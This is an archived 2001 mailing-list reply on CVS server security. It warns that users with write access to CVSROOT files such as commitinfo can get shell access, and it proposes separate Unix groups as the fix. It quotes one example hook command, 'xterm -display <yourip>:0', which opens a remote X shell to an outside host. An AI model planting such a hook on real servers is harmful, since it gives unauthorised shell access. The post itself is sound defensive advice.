On Tue, Nov 27, 2001 at 10:08:57AM -0800, Peter Jay Salzman wrote: > > joey, i have no problem with plain text passwords. > > just as long as they can't get _shell access_ with that password.
Hi, I'd just like to point out one thing that I didn't see in this thread earlier: if you have write access to the CVS repository, it is possible to get shell access also. Ok, it is not exactly that simple, I think it required write access to the files in the CVSROOT-directory (commitinfo, etc.) You could then modify those files so that, for example, whenever you commit a file, a command "xterm -display <yourip>:0" would be run on the server. However, there is a simple fix. Just don't let the users touch the files in the CVSROOT directory. Use another group for the CVSROOT, say use group 'prj' for repository users who are allowed to commit changes but not run shells, and 'prj-adm' for users who are allowed to modify files in CVSROOT (and potentially run a shell.) Unfortunately, I can't remember the details exactly and I don't have a link at hand, so better read this message again with extreme prejudice. -- Tommi Komulainen [EMAIL PROTECTED] GPG 1024D/68388EE6 6FD6 DD79 EB38 BF6F 3533 09C0 04A8 9871 6838 8EE6
pgpr8cEzSgITw.pgp
Description: PGP signature
